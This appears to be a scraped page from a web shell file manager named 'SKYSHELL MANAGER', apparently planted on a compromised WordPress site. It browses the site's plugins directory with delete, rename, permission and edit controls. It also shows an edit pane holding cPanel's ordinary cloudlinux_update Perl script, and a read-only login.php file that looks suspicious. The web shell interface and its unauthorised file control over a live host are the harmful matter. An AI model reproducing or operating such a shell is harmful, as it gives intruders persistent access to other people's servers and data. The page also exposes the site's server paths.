📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
redlightsquared.com
/
wp-content
/
plugins
/
Name
Size
Perm
Actions
📁
adminify
-
0755
🗑️
🏷️
🔒
📁
adminify-activity-logs
-
0755
🗑️
🏷️
🔒
📁
adminify-pro
-
0755
🗑️
🏷️
🔒
📁
akismet
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration
-
0755
🗑️
🏷️
🔒
📁
all-in-one-wp-migration-unlimited-extension
-
0755
🗑️
🏷️
🔒
📁
authorizenet-payment-gateway-for-woocommerce
-
0755
🗑️
🏷️
🔒
📁
backuply
-
0755
🗑️
🏷️
🔒
📁
backuply-pro
-
0755
🗑️
🏷️
🔒
📁
cf7-conditional-fields
-
0755
🗑️
🏷️
🔒
📁
classic-editor
-
0755
🗑️
🏷️
🔒
📁
code-snippets
-
0755
🗑️
🏷️
🔒
📁
contact-form-7
-
0755
🗑️
🏷️
🔒
📁
cookieadmin
-
0755
🗑️
🏷️
🔒
📁
cookieadmin-pro
-
0755
🗑️
🏷️
🔒
📁
crisp
-
0755
🗑️
🏷️
🔒
📁
duplicate-page
-
0755
🗑️
🏷️
🔒
📁
duplicator
-
0755
🗑️
🏷️
🔒
📁
export-media-with-selected-content
-
0755
🗑️
🏷️
🔒
📁
google-listings-and-ads
-
0755
🗑️
🏷️
🔒
📁
google-site-kit
-
0755
🗑️
🏷️
🔒
📁
gosmtp
-
0755
🗑️
🏷️
🔒
📁
gosmtp-pro
-
0755
🗑️
🏷️
🔒
📁
header-footer
-
0755
🗑️
🏷️
🔒
📁
litespeed-cache
-
0755
🗑️
🏷️
🔒
📁
loginizer
-
0755
🗑️
🏷️
🔒
📁
loginizer-security
-
0755
🗑️
🏷️
🔒
📁
loginpress
-
0755
🗑️
🏷️
🔒
📁
masterslider
-
0755
🗑️
🏷️
🔒
📁
oxygen
-
0755
🗑️
🏷️
🔒
📁
oxygen-gutenberg
-
0755
🗑️
🏷️
🔒
📁
oxygen-woocommerce
-
0755
🗑️
🏷️
🔒
📁
pagelayer
-
0755
🗑️
🏷️
🔒
📁
pagelayer-pro
-
0755
🗑️
🏷️
🔒
📁
pdf-embedder
-
0755
🗑️
🏷️
🔒
📁
rolemaster-suite
-
0755
🗑️
🏷️
🔒
📁
siteseo
-
0755
🗑️
🏷️
🔒
📁
siteseo-pro
-
0755
🗑️
🏷️
🔒
📁
speedycache
-
0755
🗑️
🏷️
🔒
📁
speedycache-pro
-
0755
🗑️
🏷️
🔒
📁
wc-external-product-new-tab
-
0755
🗑️
🏷️
🔒
📁
woocommerce
-
0755
🗑️
🏷️
🔒
📁
wordpress-seo
-
0755
🗑️
🏷️
🔒
📁
wp-headers-and-footers
-
0755
🗑️
🏷️
🔒
📄
error_log
1350.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
login.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cloudlinux_update
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - bin/cloudlinux_update Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; use warnings; use Cpanel::CloudLinux (); use Cpanel::SafeRun::Simple (); use Cpanel::SafeRun::Dynamic (); use Cpanel::OS (); use Cpanel::Pkgr (); use Cpanel::Binaries::Rpm (); my $from_installer = $ENV{'CPANEL_BASE_INSTALL'} ? 1 : 0; exit if Cpanel::CloudLinux::nocloudlinux(); # Manually disabled exit unless ( Cpanel::CloudLinux::supported_envtype() && Cpanel::OS::supports_or_can_become_cloudlinux() ); if ( Cpanel::OS::is_cloudlinux() ) { my $installed = Cpanel::Pkgr::installed_packages(); my $rpm = Cpanel::Binaries::Rpm->new; foreach my $dep_rpm (qw{ cpanel-lvemanager cpanel-lve lve-cpanel-plugin }) { next unless exists $installed->{$dep_rpm}; $rpm->cmd( '-e', '--justdb', '--nodeps', $dep_rpm ); } # Remove CloudLinux RPM provided files my @deprecated_files = qw{ /usr/local/cpanel/whostmgr/docroot/cgi/addon_CloudLinux.cgi /usr/local/cpanel/whostmgr/docroot/images/addon_CloudLinux_logo.png }; foreach my $file (@deprecated_files) { if ( -e $file ) { unlink $file; } } # Removed deprecated EasyApache hooks (replaced by native support) Cpanel::SafeRun::Simple::saferun('/usr/local/cpanel/bin/cloudlinux_cleanoldhooks'); ## case 51423: the 'cloudlinux_registered' touch file indicates a recently acquired cPanel ## license on a CloudLinux enabled machine; run clnreg_ks to ensure registration if ( Cpanel::CloudLinux::licensed() && !-e '/var/cpanel/cloudlinux_registered' ) { Cpanel::SafeRun::Simple::saferun( '/usr/sbin/clnreg_ks', '--force' ); system( 'touch', '/var/cpanel/cloudlinux_registered' ); } } elsif ( Cpanel::CloudLinux::licensed() ) { # If this is a new installation, install CloudLinux. This should be followed by EasyApache build # via the cPanel & WHM installer if ($from_installer) { print "Performing initial CloudLinux setup.\n"; Cpanel::CloudLinux::install_cloudlinux(); # dies/exits unclean if it fails which is what we want print "Finished initial CloudLinux setup.\n"; exit 0; } # Only notify that CloudLinux installation is needed else { require Cpanel::Hostname; require Cpanel::IP::Remote; require Cpanel::iContact::Class::CloudLinux::Update; my $hostname = Cpanel::Hostname::gethostname(); my %icontact_args = ( 'hostname' => $hostname, 'source_ip_address' => Cpanel::IP::Remote::get_current_remote_ip(), 'origin' => 'cloudlinux_update', ); require Cpanel::Notify; my $ic_obj = Cpanel::Notify::notification_class( 'class' => 'CloudLinux::Update', 'application' => 'CloudLinux::Update', 'constructor_args' => [ %icontact_args, 'skip_send' => 1 ] ); my $message_body = $ic_obj->render_template_include_as_text( 'template' => 'body', 'type' => 'html' ); print <<"EOM"; !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $message_body !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! EOM require Cpanel::Notify; Cpanel::Notify::notification_class( application => 'cloudlinux_update', interval => ( 60 * 60 * 24 * 7 ), status => 'Manual Installation Needed', class => 'CloudLinux::Update', constructor_args => [ %icontact_args, ], ); } } __END__
Save